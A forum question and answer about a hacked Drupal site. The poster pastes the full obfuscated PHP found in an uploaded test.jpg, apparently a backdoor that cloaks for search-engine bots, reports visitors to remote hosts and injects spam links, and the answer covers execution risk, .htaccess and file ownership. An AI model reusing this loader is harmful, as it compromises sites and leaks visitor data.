PHP code in image file



  • My drupal website was getting hacked recently. While cleaning up the malicious scripts, I found that the hacker uploaded an image file (sites/default/files/test.jpg) contains below code.

    error_reporting(0);
    require_once('includes/session.inc');
    $serialized = 'a:36:{i:0;s:320:"aWYoIWNsYXNzX2V4aXN0cygnUmF0ZWwnKSl7aWYoZnVuY3Rpb25fZXhpc3RzKCdpc191c2VyX2xvZ2dlZF9pbicpKXtpZihpc191c2VyX2xvZ2dlZF9pbigpKXtyZXR1cm4gZmFsc2U7fX1pZihpc3NldCgkX1JFUVVFU1RbJ3hmdGVzdCddKSl7ZGllKHBpKCkqNik7fUBpbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsMCk7QGluaV9zZXQoJ2Vycm9yX3JlcG9ydGluZycsMCk7QGluaV9zZXQoJ2xvZ19lcnJvcnMnLE5VTEwpOw==";i:1;s:184:"QGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLDQpO2lmKCFpc3NldCgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pfHwhdHJpbSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtyZXR1cm4gZmFsc2U7fSRpc19ib3Q9MDs=";i:2;s:172:"aWYoQHByZWdfbWF0Y2goIi8oZ29vZ2xlYm90fG1zbmJvdHx5YWhvb3xzZWFyY2h8YmluZ3xhc2t8aW5kZXhlcnxjdWlsbC5jb218Y2x1c2hib3QpL2kiLCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpeyRpc19ib3Q9MTt9";i:3;s:384:"JHJ1cmk9dHJpbSgkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSwiXHRcblxyXDBceDBCLyIpOyRiYWRfdXJscz0nI3htbHJwYy5waHB8d3AtaW5jbHVkZXN8d3AtY29udGVudHx3cC1sb2dpbi5waHB8d3AtY3Jvbi5waHB8XD9mZWVkPXx3cC1qc29ufFwvZmVlZHxcLmNzc3xcLmpzfFwuaWNvfFwucG5nfFwuZ2lmfFwuYm1wfFwudGlmZnxcLm1wZ3xcLndtdnxcLm1wM3xcLm1wZWd8XC56aXB8XC5nemlwfFwucmFyfFwuZXhlfFwucGRmfFwuZG9jfFwuc3dmfFwudHh0fHdwLWFkbWlufGFkbWluaXN0cmF0b3IjaSc7";i:4;s:264:"aWYocHJlZ19tYXRjaCgkYmFkX3VybHMsJHJ1cmkpKXtyZXR1cm4gZmFsc2U7fSRob3N0PSd1bmtub3duJztpZihpc3NldCgkX1NFUlZFUlsiSFRUUF9IT1NUIl0pKXtpZihpc3NldCgkX1NFUlZFUlsiSFRUUF9YX0ZPUldBUkRFRF9IT1NUIl0pKXskX1NFUlZFUlsiSFRUUF9IT1NUIl09JF9TRVJWRVJbIkhUVFBfWF9GT1JXQVJERURfSE9TVCJdO30=";i:5;s:188:"JHRtcD1wYXJzZV91cmwoJ2h0dHA6Ly8nIC4kX1NFUlZFUlsiSFRUUF9IT1NUIl0pO2lmKCR0bXBbJ2hvc3QnXSl7JGhvc3Q9JHRtcFsnaG9zdCddO2lmKHN1YnN0cigkaG9zdCwwLDQpPT0gJ3d3dy4nKXskaG9zdD1zdWJzdHIoJGhvc3QsNCk7fX0=";i:6;s:144:"aWYoaXNzZXQoJF9SRVFVRVNUW21kNShtZDUoJGhvc3QpKV0pT1IgaXNzZXQoJF9DT09LSUVbbWQ1KG1kNSgkaG9zdCkpXSkpe2RpZSgnc3VzcGljaW91cyByZXF1ZXN0IGRlbmllZCcpO319";i:7;s:248:"Y2xhc3MgUmF0ZWx7cHVibGljICRsaW5rc191cmw9Ilx4NjhceDc0XHg3NFx4NzBceDNhXHgyZlx4MmZceDc5XHg2NVx4NmRceDY1XHg2Ylx4NzRceDYxXHg3Mlx4NjlceDY2XHg2OVx4MzJceDM0XHgyZVx4NjNceDZmXHg2ZFx4MmZceDZmXHg2ZVx4NjVceDY3XHg3NFx4MmZceDY3XHg2NVx4NzRceDJlXHg3MFx4NjhceDcwIjs=";i:8;s:232:"cHVibGljICRkb29yX3VybD0iXHg2OFx4NzRceDc0XHg3MFx4M2FceDJmXHgyZlx4NjJceDZjXHg2Zlx4NjNceDZiXHg2MVx4NjRceDczXHgyZVx4NmRceDY1XHg2ZVx4MmYiO3B1YmxpYyAkaXA9Jyc7cHVibGljICR1YT0nJztwdWJsaWMgJGNzcz0nJztwdWJsaWMgJGpzPScnO3B1YmxpYyAkaG9zdD0nJzs=";i:9;s:216:"cHVibGljICRpcF9saXN0cz1hcnJheSgnZ29vZ2xlJz0+YXJyYXkoJzIwMy4yMDguNjAuMC8yNCcsJzY2LjI0OS42NC4wLzIwJywnNzIuMTQuMTk5LjAvMjQnLCcyMDkuODUuMjM4LjAvMjQnLCc2Ni4yNDkuOTAuMC8yNCcsJzY2LjI0OS45MS4wLzI0JywnNjYuMjQ5LjkyLjAvMjQnKSw=";i:10;s:300:"J2JpbmcnPT5hcnJheSgnNjcuMTk1LjM3LjAvMjQnLCc2Ny4xOTUuNTAuMC8yNCcsJzY3LjE5NS4xMTAuMC8yNCcsJzY3LjE5NS4xMTEuMC8yNCcsJzY3LjE5NS4xMTIuMC8yMycsJzY3LjE5NS4xMTQuMC8yNCcsJzY3LjE5NS4xMTUuMC8yNCcsJzY4LjE4MC4yMjQuMC8yMScsJzcyLjMwLjEzMi4wLzI0JywnNzIuMzAuMTQyLjAvMjQnLCc3Mi4zMC4xNjEuMC8yNCcsJzcyLjMwLjE5Ni4wLzI0Jyw=";i:11;s:492:"JzcyLjMwLjE5OC4wLzI0JywnNzQuNi4yNTQuMC8yNCcsJzc0LjYuOC4wLzI0JywnNzQuNi4xMy4wLzI0JywnNzQuNi4xNy4wLzI0JywnNzQuNi4xOC4wLzI0JywnNzQuNi4yMi4wLzI0JywnNzQuNi4yNy4wLzI0JywnOTguMTM3LjcyLjAvMjQnLCc5OC4xMzcuMjA2LjAvMjQnLCc5OC4xMzcuMjA3LjAvMjQnLCc5OC4xMzkuMTY4LjAvMjQnLCcxMTQuMTExLjk1LjAvMjQnLCcxMjQuODMuMTU5LjAvMjQnLCcxMjQuODMuMTc5LjAvMjQnLCcxMjQuODMuMjIzLjAvMjQnLCcxODMuNzkuNjMuMC8yNCcsJzE4My43OS45Mi4wLzI0JywnMjAzLjIxNi4yNTUuMC8yNCcsJzIxMS4xNC4xMS4wLzI0JywnNjUuNTIuMTA0LjAvMjQnLCc2NS41Mi4xMDguMC8yMics";i:12;s:204:"JzY1LjU1LjI0LjAvMjQnLCc2NS41NS41Mi4wLzI0JywnNjUuNTUuNTUuMC8yNCcsJzY1LjU1LjIxMy4wLzI0JywnNjUuNTUuMjE3LjAvMjQnLCcxMzEuMjUzLjI0LjAvMjInLCcxMzEuMjUzLjQ2LjAvMjMnLCc0MC43Ny4xNjcuMC8yNCcsJzE5OS4zMC4yNy4wLzI0Jyw=";i:13;s:448:"JzE1Ny41NS4xNi4wLzIzJywnMTU3LjU1LjE4LjAvMjQnLCcxNTcuNTUuMzIuMC8yMicsJzE1Ny41NS4zNi4wLzI0JywnMTU3LjU1LjQ4LjAvMjQnLCcxNTcuNTUuMTA5LjAvMjQnLCcxNTcuNTUuMTEwLjQwLzI5JywnMTU3LjU1LjExMC40OC8yOCcsJzE1Ny41Ni45Mi4wLzI0JywnMTU3LjU2LjkzLjAvMjQnLCcxNTcuNTYuOTQuMC8yMycsJzE1Ny41Ni4yMjkuMC8yNCcsJzE5OS4zMC4xNi4wLzI0JywnMjA3LjQ2LjEyLjAvMjMnLCcyMDcuNDYuMTkyLjAvMjQnLCcyMDcuNDYuMTk1LjAvMjQnLCcyMDcuNDYuMTk5LjAvMjQnLCcyMDcuNDYuMjA0LjAvMjQnLCcxNTcuNTUuMzkuMC8yNCcpLA==";i:14;s:504:"J2JhaWR1Jz0+YXJyYXkoJzE4MC43Ni4xNS4wLzI0JywnMTE5LjYzLjE5Ni4wLzI0JywnMTE1LjIzOS4yMTIuLzI0JywnMTE5LjYzLjE5OS4wLzI0JywnMTIyLjgxLjIwOC4wLzIyJywnMTIzLjEyNS43MS4wLzI0JywnMTgwLjc2LjQuMC8yNCcsJzE4MC43Ni41LjAvMjQnLCcxODAuNzYuNi4wLzI0JywnMTg1LjEwLjEwNC4wLzI0JywnMjIwLjE4MS4xMDguMC8yNCcsJzIyMC4xODEuNTEuMC8yNCcsJzExMS4xMy4xMDIuMC8yNCcsJzEyMy4xMjUuNjcuMTQ0LzI5JywnMTIzLjEyNS42Ny4xNTIvMzEnLCc2MS4xMzUuMTY5LjAvMjQnLCcxMjMuMTI1LjY4LjY4LzMwJywnMTIzLjEyNS42OC43Mi8yOScsJzEyMy4xMjUuNjguODAvMjgnLCcxMjMuMTI1LjY4Ljk2LzMwJyw=";i:15;s:124:"JzIwMi40Ni40OC4wLzIwJywnMjIwLjE4MS4zOC4wLzI0JywnMTIzLjEyNS42OC44MC8zMCcsJzEyMy4xMjUuNjguODQvMzEnLCcxMjMuMTI1LjY4LjAvMjQnKSw=";i:16;s:512:"J3lhbmRleCc9PmFycmF5KCcxMDAuNDMuOTAuMC8yNCcsJzM3LjkuMTE1LjAvMjQnLCczNy4xNDAuMTY1LjAvMjQnLCc3Ny44OC4yMi4wLzI1JywnNzcuODguMjkuMC8yNCcsJzc3Ljg4LjMxLjAvMjQnLCc3Ny44OC41OS4wLzI0JywnODQuMjAxLjE0Ni4wLzI0JywnODQuMjAxLjE0OC4wLzI0JywnODQuMjAxLjE0OS4wLzI0JywnODcuMjUwLjI0My4wLzI0JywnODcuMjUwLjI1My4wLzI0JywnOTMuMTU4LjE0Ny4wLzI0JywnOTMuMTU4LjE0OC4wLzI0JywnOTMuMTU4LjE1MS4wLzI0JywnOTMuMTU4LjE1My4wLzMyJywnOTUuMTA4LjEyOC4wLzI0JywnOTUuMTA4LjEzOC4wLzI0JywnOTUuMTA4LjE1MC4wLzIzJywnOTUuMTA4LjE1OC4wLzI0JywnOTUuMTA4LjE1Ni4wLzI0Jyw=";i:17;s:220:"Jzk1LjEwOC4xODguMTI4LzI1JywnOTUuMTA4LjIzNC4wLzI0JywnOTUuMTA4LjI0OC4wLzI0JywnMTAwLjQzLjgwLjAvMjQnLCcxMzAuMTkzLjYyLjAvMjQnLCcxNDEuOC4xNTMuMC8yNCcsJzE3OC4xNTQuMTY1LjAvMjQnLCcxNzguMTU0LjE2Ni4xMjgvMjUnLCcxNzguMTU0LjE3My4yOScs";i:18;s:444:"JzE3OC4xNTQuMjAwLjE1OCcsJzE3OC4xNTQuMjAyLjAvMjQnLCcxNzguMTU0LjIwNS4wLzI0JywnMTc4LjE1NC4yMzkuMC8yNCcsJzE3OC4xNTQuMjQzLjAvMjQnLCczNy45Ljg0LjI1MycsJzE5OS4yMS45OS45OScsJzE3OC4xNTQuMTYyLjI5JywnMTc4LjE1NC4yMDMuMjUxJywnMTc4LjE1NC4yMTEuMjUwJywnOTUuMTA4LjI0Ni4yNTInLCc1LjQ1LjI1NC4wLzI0JywnNS4yNTUuMjUzLjAvMjQnLCczNy4xNDAuMTQxLjAvMjQnLCczNy4xNDAuMTg4LjAvMjQnLCcxMDAuNDMuODEuMC8yNCcsJzEwMC40My44NS4wLzI0JywnMTAwLjQzLjkxLjAvMjQnLCcxOTkuMjEuOTkuMC8yNCcpKTs=";i:19;s:540:"cHVibGljICRib3Q9ZmFsc2U7ZnVuY3Rpb24gZ2V0X2NsaWVudF9pcCgpe2ZvcmVhY2goYXJyYXkoJ0hUVFBfQ0xJRU5UX0lQJywnSFRUUF9YX0ZPUldBUkRFRF9GT1InLCdIVFRQX1hfRk9SV0FSREVEJywnSFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQJywnSFRUUF9GT1JXQVJERURfRk9SJywnSFRUUF9GT1JXQVJERUQnLCdSRU1PVEVfQUREUicpYXMgJGtleSl7aWYoYXJyYXlfa2V5X2V4aXN0cygka2V5LCRfU0VSVkVSKT09PSB0cnVlKXtmb3JlYWNoKGFycmF5X21hcCgndHJpbScsZXhwbG9kZSgnLCcsJF9TRVJWRVJbJGtleV0pKWFzICRpcCl7aWYoZmlsdGVyX3ZhcigkaXAsRklMVEVSX1ZBTElEQVRFX0lQKSE9PSBmYWxzZSl7cmV0dXJuICRpcDt9fX19cmV0dXJuICRfU0VSVkVSWydSRU1PVEVfQUREUiddO30=";i:20;s:544:"ZnVuY3Rpb24gaW5pdCgkcnVyaSwkaG9zdCwkaXNfYm90KXskdGhpcy0+dWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOyR0aGlzLT5pc19ib3Q9JGlzX2JvdDskdGhpcy0+cnVyaT0kcnVyaTskdGhpcy0+aXA9JHRoaXMtPmdldF9jbGllbnRfaXAoKTskdGhpcy0+dGhlX2VuZCgpO31mdW5jdGlvbiB0aGVfZW5kKCl7JHRoaXMtPmRldGVjdF9ib3QoKTtpZihjb3VudCgkX0dFVCk9PT0gMSBhbmQgZW1wdHkoJF9HRVRbMF0pKXskbm90X3VyaT1lbmQoYXJyYXlfa2V5cygkX0dFVCkpO30kdXJsX3A9JHRoaXMtPmRvb3JfdXJsIC4nP2RhdGE9JyAuYmFzZTY0X2VuY29kZShAc2VyaWFsaXplKEBhcnJheSgndXJsJz0+ICRfU0VSVkVSWyJIVFRQX0hPU1QiXSwndXJpJz0+ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLA==";i:21;s:284:"J3VhJz0+ICR0aGlzLT51YSwncmVmJz0+ICRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSwnaXAnPT4gJHRoaXMtPmlwLCdub3RfdXJpJz0+ICRub3RfdXJpLCdsYW5nJz0+ICRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddLCdib3QnPT4gJHRoaXMtPmJvdCkpKSAuJyZ1cmw9JyAuJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyRjb250ZW50PSR0aGlzLT5nZXQoJHVybF9wKTs=";i:22;s:316:"aWYoIWVtcHR5KCRjb250ZW50KW9yICRjb250ZW50ICE9ICcnKXskY29udGVudD1AYmFzZTY0X2RlY29kZSgkY29udGVudCk7aWYoc3RycG9zKCRjb250ZW50LCc0MDRfbm90X2ZvdW5kJykhPT0gZmFsc2Upe2hlYWRlcigiSFRUUC8xLjAgNDA0IE5vdCBGb3VuZCIpO2V4aXQ7fWlmKHN0cnJpcG9zKCRjb250ZW50LCcga2V5cy8nIC4kX1NFUlZFUlsiSFRUUF9IT1NUIl0pIT09IGZhbHNlKXtyZXR1cm4gZmFsc2U7fQ==";i:23;s:320:"aWYoQHN0cnBvcyhAc3RydG9sb3dlcigkY29udGVudCksJzwvaHRtbD4nKSE9PSBmYWxzZSl7ZGllKCRjb250ZW50KTt9fWVsc2V7JHRoaXMtPmxpbmtzPSR0aGlzLT5tYWtlX2xpbmtzKCk7aWYoIWVtcHR5KCR0aGlzLT5saW5rcylvciAkdGhpcy0+bGlua3MgIT09IEZhbHNlKXtvYl9zdGFydChhcnJheSgkdGhpcywncndjb250ZW50JykpO3JlZ2lzdGVyX3NodXRkb3duX2Z1bmN0aW9uKCdvYl9lbmRfZmx1c2gnKTt9fX0=";i:24;s:608:"ZnVuY3Rpb24gbWFrZV9saW5rcygpeyRob3N0PSd1bmtub3duJztpZihpc3NldCgkX1NFUlZFUlsiSFRUUF9YX0ZPUldBUkRFRF9IT1NUIl0pKXskX1NFUlZFUlsiSFRUUF9IT1NUIl09JF9TRVJWRVJbIkhUVFBfWF9GT1JXQVJERURfSE9TVCJdO30kdG1wPUBwYXJzZV91cmwoJ2h0dHA6Ly8nIC4kX1NFUlZFUlsiSFRUUF9IT1NUIl0pO2lmKGlzc2V0KCR0bXBbJ2hvc3QnXSkpeyRob3N0PSR0bXBbJ2hvc3QnXTt9JHBhZ2U9JHRoaXMtPmdldCgiJHRoaXMtPmxpbmtzX3VybD9ob3N0PSRob3N0JnVyaT0iIC51cmxlbmNvZGUoJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0pIC4iJmJvdD17JHRoaXMtPmJvdH0maXA9IiAudXJsZW5jb2RlKCR0aGlzLT5pcCkpO2lmKHN0cnBvcygkcGFnZSwnPGxpbms+JykhPT0gRkFMU0Upe3ByZWdfbWF0Y2hfYWxsKCd+PGxpbms+KC4qPyk8L2xpbms+ficsJHBhZ2UsJG0pOw==";i:25;s:368:"JGxpbmtzPWlzc2V0KCRtWzFdKT8kbVsxXTphcnJheSgpO3JldHVybiAkbGlua3M7fXJldHVybiBmYWxzZTt9ZnVuY3Rpb24gcndjb250ZW50KCRjb250ZW50KXskdGFncz1hcnJheSgncCcsJ3NwYW4nLCdzdHJvbmcnLCdlbScsJ2knLCd0ZCcsJ2RpdicsJ3VsJywnbGknLCdzcGFuJywnYm9keScpOyR0YWdzX3ZhbHM9YXJyYXkoKTtmb3JlYWNoKCR0YWdzIGFzICR0YWcpe3ByZWdfbWF0Y2hfYWxsKCJ+PHskdGFnfS4qPz4oLio/KTwveyR0YWd9Pn5pIiwkY29udGVudCwkbWF0Y2hlcyk7";i:26;s:212:"aWYoQGlzc2V0KCRtYXRjaGVzWzBdKSl7Zm9yZWFjaCgkbWF0Y2hlc1swXWFzICRtYXRjaCl7JHRhZ3NfdmFsc1tdPWFycmF5KCd0YWcnPT4gJHRhZywnY29udGVudCc9PiAkbWF0Y2gpO319aWYoY291bnQoJHRhZ3NfdmFscyk+Y291bnQoJHRoaXMtPmxpbmtzKSl7YnJlYWs7fX0=";i:27;s:612:"Zm9yZWFjaCgkdGhpcy0+bGlua3MgYXMgJGxpbmtfaW5kZXggPT4gJGxpbmspe2ZvcmVhY2goJHRhZ3NfdmFscyBhcyAkdGFnX2luZGV4ID0+ICR0YWdfdmFsKXtpZihzdHJsZW4oJHRhZ192YWxbJ2NvbnRlbnQnXSklMiA9PSAxKXskdGFnX2NvbnRlbnRfbmV3PSR0YWdfdmFsWydjb250ZW50J107JHRhZ19jb250ZW50X25ldz1wcmVnX3JlcGxhY2UoIig8eyR0YWdfdmFsWyd0YWcnXX0uKj8+KSIsIiQweyRsaW5rfSAiLCR0YWdfY29udGVudF9uZXcsMSk7fWVsc2V7aWYoc3Vic3RyKCR0YWdfdmFsWydjb250ZW50J10sLShzdHJsZW4oJHRhZ192YWxbJ3RhZyddKSs0KSk9PSIuPC97JHRhZ192YWxbJ3RhZyddfT4iKXskdGFnX2NvbnRlbnRfbmV3PXN0cl9yZXBsYWNlKCIuPC97JHRhZ192YWxbJ3RhZyddfT4iLCIgeyRsaW5rfS48L3skdGFnX3ZhbFsndGFnJ119PiIsJHRhZ192YWxbJ2NvbnRlbnQnXSk7fQ==";i:28;s:420:"ZWxzZXskdGFnX2NvbnRlbnRfbmV3PXN0cl9yZXBsYWNlKCI8L3skdGFnX3ZhbFsndGFnJ119PiIsIiB7JGxpbmt9IDwveyR0YWdfdmFsWyd0YWcnXX0+IiwkdGFnX3ZhbFsnY29udGVudCddKTt9fSRjb250ZW50PXByZWdfcmVwbGFjZSgifnskdGFnX3ZhbFsnY29udGVudCddfX5pIiwkdGFnX2NvbnRlbnRfbmV3LCRjb250ZW50LDEpO3Vuc2V0KCR0YWdzX3ZhbHNbJHRhZ19pbmRleF0pO2lmKHN0cnBvcygkY29udGVudCwkbGluaykhPT0gZmFsc2Upe3Vuc2V0KCRsaW5rc1skbGlua19pbmRleF0pO2NvbnRpbnVlIDI7fX19cmV0dXJuICRjb250ZW50O30=";i:29;s:424:"ZnVuY3Rpb24gZGV0ZWN0X2JvdCgpe2lmKEBwcmVnX21hdGNoKCcvZ29vZ2xlL2knLCR0aGlzLT51YSkpeyR0aGlzLT5ib3Q9J2dvb2dsZSc7cmV0dXJuO31pZihAcHJlZ19tYXRjaCgnL2Jpbmd8bXNufG1zcnxzbHVycHx5YWhvby9pJywkdGhpcy0+dWEpKXskdGhpcy0+Ym90PSdiaW5nJztyZXR1cm47fWlmKEBwcmVnX21hdGNoKCcveWFuZGV4fHlhZGlyZWN0Ym90L2knLCR0aGlzLT51YSkpeyR0aGlzLT5ib3Q9J3lhbmRleCc7cmV0dXJuO31pZihAcHJlZ19tYXRjaCgnL2JhaWR1L2knLCR0aGlzLT51YSkpeyR0aGlzLT5ib3Q9J2JhaWR1JztyZXR1cm47fQ==";i:30;s:516:"aWYoQHByZWdfbWF0Y2goJ35hcG9ydHxyYW1ibGVyfGFiYWNob2JvdHxhY2Nvb25hfGFjb2lyb2JvdHxhc3BzZWVrfGNyb2NjcmF3bGVyfGR1bWJvdHx3ZWJjcmF3bGVyfGdlb25hYm90fGdpZ2Fib3R8bHljb3N8c2Nvb3RlcnxhbHRhdmlzdGF8d2ViYWx0YXxhZGJvdHxlc3R5bGV8bWFpbC5ydXxzY3J1YmJ5fmknLCR0aGlzLT51YSkpeyR0aGlzLT5ib3Q9J290aGVyJztyZXR1cm47fSRpcGw9aXAybG9uZygkdGhpcy0+aXApO2ZvcmVhY2goJHRoaXMtPmlwX2xpc3RzIGFzICRjcmF3bGVyID0+ICRtYXNrcyl7Zm9yZWFjaCgkbWFza3MgYXMgJG1hc2spe2lmKCFzdHJwb3MoJG1hc2ssJy8nKSl7aWYoJHRoaXMtPmlwID09ICRtYXNrKXskdGhpcy0+Ym90PSRjcmF3bGVyO3JldHVybjs=";i:31;s:576:"fX1lbHNlaWYoQCR0aGlzLT5jaWRyX21hdGNoKCRpcGwsJG1hc2spKXskdGhpcy0+Ym90PSRjcmF3bGVyO3JldHVybjt9fX0kcmVmZXJlcj1AZ2V0aG9zdGJ5YWRkcigkdGhpcy0+aXApO2lmKEBwcmVnX21hdGNoKCcvZ29vZ2xlL2knLCRyZWZlcmVyKSl7JHRoaXMtPmJvdD0nZ29vZ2xlJztyZXR1cm47fWlmKEBwcmVnX21hdGNoKCcvYmluZ3xtc258bXNyfHNsdXJwfHlhaG9vfG1pY3Jvc29mdC9pJywkcmVmZXJlcikpeyR0aGlzLT5ib3Q9J2JpbmcnO3JldHVybjt9fWZ1bmN0aW9uIGNpZHJfbWF0Y2goJGlwLCRyYW5nZSl7bGlzdCgkc3VibmV0LCRiaXRzKT1leHBsb2RlKCcvJywkcmFuZ2UpOyRzdWJuZXQ9aXAybG9uZygkc3VibmV0KTskbWFzaz0tMSA8PCgzMi0kYml0cyk7JHN1Ym5ldCAmPSAkbWFzaztyZXR1cm5AKCRpcCYkbWFzayk9PSAkc3VibmV0O30=";i:32;s:500:"ZnVuY3Rpb24gZ2V0KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpeyRjaD1jdXJsX2luaXQoJHVybCk7Y3VybF9zZXRvcHQoJGNoLENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsOCk7Y3VybF9zZXRvcHQoJGNoLENVUkxPUFRfVElNRU9VVCwxNSk7Y3VybF9zZXRvcHQoJGNoLENVUkxPUFRfSEVBREVSLDApO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLDEpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1VTRVJBR0VOVCwnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzMzLjAuMTc1MC4xNTQgU2FmYXJpLzUzNy4zNicpOw==";i:33;s:548:"JGRhdGE9Y3VybF9leGVjKCRjaCk7Y3VybF9jbG9zZSgkY2gpO3JldHVybiAkZGF0YTt9ZWxzZWlmKEBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSl7cmV0dXJuQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpO31lbHNleyRwYXJ0cz1wYXJzZV91cmwoJHVybCk7JHRhcmdldD0kcGFydHNbJ2hvc3QnXTskcG9ydD1pc3NldCgkcGFydHNbJ3BvcnQnXSk/JHBhcnRzWydwb3J0J106ODA7JHBhZ2U9aXNzZXQoJHBhcnRzWydwYXRoJ10pPyRwYXJ0c1sncGF0aCddOicnOyRwYWdlIC49IGlzc2V0KCRwYXJ0c1sncXVlcnknXSk/Jz8nIC4kcGFydHNbJ3F1ZXJ5J106Jyc7JHBhZ2UgLj0gaXNzZXQoJHBhcnRzWydmcmFnbWVudCddKT8nIycgLiRwYXJ0c1snZnJhZ21lbnQnXTonJzskcGFnZT0oJHBhZ2UgPT0gJycpPycvJzokcGFnZTs=";i:34;s:616:"aWYoJGZwPUBmc29ja29wZW4oJHRhcmdldCwkcG9ydCwkZXJybm8sJGVycnN0ciwzKSl7QHNvY2tldF9zZXRfb3B0aW9uKCRmcCxTT0xfU09DS0VULFNPX1JDVlRJTUVPLGFycmF5KCJzZWMiPT4gMSwidXNlYyI9PiAxKSk7JGhlYWRlcnM9IkdFVCAkcGFnZSBIVFRQLzEuMVxyXG4iOyRoZWFkZXJzIC49Ikhvc3Q6IHskcGFydHNbJ2hvc3QnXX1cclxuIjskaGVhZGVycyAuPSAiQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiI7aWYoZndyaXRlKCRmcCwkaGVhZGVycykpeyRyZXNwPScnO3doaWxlKCFmZW9mKCRmcCkmJigkY3Vycj1mZ2V0cygkZnAsMTI4KSkhPT0gZmFsc2UpeyRyZXNwIC49ICRjdXJyO31pZihpc3NldCgkY3VycikmJiAkY3VyciAhPT0gZmFsc2Upe2ZjbG9zZSgkZnApO3JldHVybiBzdWJzdHIoc3Ryc3RyKCRyZXNwLCJcclxuXHJcbiIpLDMpO319ZmNsb3NlKCRmcCk7fX1yZXR1cm4gVFJVRTt9fQ==";i:35;s:152:"JHJhdGVsPW5ldyBSYXRlbDskcmF0ZWwtPmluaXQoJHJ1cmksJGhvc3QsJGlzX2JvdCk7aWYoIWVtcHR5KCRfUkVRVUVTVFsnc2V0X2xhbmcnXSkpIGVjaG8gJzwhLS0gbGFuZ19VU18yIC0tPic7fQ==";}';
    $rawData = array_map("base64_decode", unserialize($serialized));
    $rawData = implode($rawData);
    $outputData = create_function(false, $rawData);
    call_user_func($outputData);
    

    Questions:

    1. Since the file extension is .jpg, will the php code get executed?
    2. As I understand, drupal will create a .htaccess files in sites/default/files directory with code php_flag engine off, does that means the all php code in files directory can't get executed?

    Let say I don't want to update my drupal application to latest version, I was thinking if below make sense?

    1. I change all directory & files permission (except sites/default/files) to 555 or 444. Meaning hacker wouldn't be able to upload any scripts to my server? Is this consider safe in this way?

    2. I added

      <FilesMatch "\.(php)$">Order allow,deny</FilesMatch>
      

      in sites/default/files/.htaccess, will it more secure? or not necessary?



    1. The code won't be executed by the web-server (or fcgi process) unless misconfigured but may be executed by other php files. Normally you scan php files for exploits, and obfuscated code looks suspicious. It's reasonable to masquerade it to a jpg file and do something like this* in an another (corrupted) php file (which looks less suspicious):

      $default = "test.jpg";

      [...lots of valid code... ]

      include $default;

    2. Depends on the particular software and configuration. Eg. nginx won't honor .htaccess files. It is also possible to disable .htaccess evaluation in apache config. The original intent of the file is that what you correctly identified. The exact result depends on the actual configuration. If you have control over the webserver, security options should go to the server-config directly instead of .htaccess anyway.

    3. Changing file permissions won't help much if it can be changed back. You have to modify the owner of the files and the directories while removing write permission. (Execute flag is not necessary to run a php script, 444 is ok.) You need to do something like chown -R manager . for everything except the upload directory. Of course it means you need a second user (eg. manager) for file uploads and updates, which is different to the user owning the apache php module or fcgi process. It's always a good practice!

    4. Not really. Order directive only affects on the interpretation order of other directives. Without the respective Allow and Deny directives we don't know much.

    * If there is a dynamic include or eval in the application code, that also can be exploited.



Suggested Topics

  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2